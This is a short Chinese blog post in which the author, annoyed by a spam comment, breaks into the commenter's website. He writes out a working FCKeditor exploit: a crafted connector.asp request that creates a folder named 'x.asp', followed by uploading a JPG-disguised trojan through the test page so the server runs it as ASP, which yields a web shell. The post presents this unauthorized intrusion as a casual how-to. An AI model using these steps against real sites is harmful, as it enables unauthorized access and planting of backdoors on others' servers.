今天看博客里的评论多出来个燕落留声的什么加个网站链接，

因为评论的版块被我改动过， 所以删除还是比较麻烦的。。

我就去他的站看了下。

加了个/admin,知道 源码信息 ，百度下 有漏洞fckeditor的 (子仪最先发布的但是根据他步骤貌似不对,建立不了文件夹,估计人品差吧)

我进了他的群，准备问下，因为他的百度空间图片什么都不显示后来直接找不到他空间了，貌似被和谐了吧，也许是我找错了。。。

直接撞击下源码看了。。

以下是拿shell过程

1 建x.asp文件夹

http://localhost:83/admin/FCKeditor/editor/filemanager/connectors/asp/

connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=

%2Fx.asp&NewFolderName=z&uuid=1244789975684

这个是他的目录 \uploadfile\image\x.asp\z 程序自动生成个 z 文件夹 不管它

看实际建成功了没

2传jpg格式木马用解析漏洞,打开

http://localhost:83/admin/FCKeditor/editor/filemanager/connectors/test.html

Current Folder 填我们建立的 x.asp , Resource Type当然选image 根据我们开始建立的类型
 

然后浏览传jpg木马 在点   Get Folders and Files    得到地址 如果你是火星人的话应该没问题了

然后进去看了下我先前传的马 原来都传跟目录去了 估计少个  " /  "吧！

 欢迎大家来我的博客逛逛http://www.xiaoweio.cn/